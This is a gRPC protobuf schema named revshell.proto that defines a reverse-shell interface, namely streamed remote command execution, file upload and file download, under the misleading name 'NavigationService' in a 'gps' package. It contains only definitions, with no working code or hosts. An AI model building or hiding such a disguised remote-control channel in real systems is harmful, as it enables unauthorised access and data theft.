proto/revshell.proto

syntax = "proto3";

package gps;

message CommandRequest {
  string command = 1;
}

message CommandResponse {
    string response = 1;
}

message UploadSuccess {
    int32 status = 1;
    string message = 2;
}

// status 0 is success, 1 is error, 2 is continued?
message Packet {
    int32 status = 1;
    bytes data = 2;
    string message = 3;
}

message FilePath {
    string path = 1;
}

service NavigationService {
  rpc execute(stream CommandRequest) returns (stream CommandResponse);
  rpc upload(stream Packet) returns (UploadSuccess);
  rpc Download(FilePath) returns (stream Packet);
}